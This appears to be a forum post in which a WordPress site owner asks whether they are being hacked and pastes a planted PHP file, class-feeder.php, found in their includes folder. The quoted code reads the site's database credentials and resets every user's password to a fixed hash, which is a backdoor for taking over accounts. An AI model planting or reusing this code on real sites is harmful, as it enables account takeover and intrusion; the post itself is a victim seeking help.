I am very concerned about a file is being added and accessed, its says in my cpanel
I found that there was this class-feeder.php added in include folder and has a little code in it saying
<?php
include_once '../wp-config.php';
$con=mysql_connect('localhost',DB_USER,DB_PASSWORD) or die(mysql_error());
mysql_select_db(DB_NAME,$con) or die(mysql_error());
$sql="Update wp_users set user_pass='$"."P"."$"."Bs4sdfEreymQasdfwMzJaasdfasdf4dj20'";
mysql_query($sql,$con) or die(mysql_error());
?>
am I being hacked, because all my images in the upload folder is empty, please help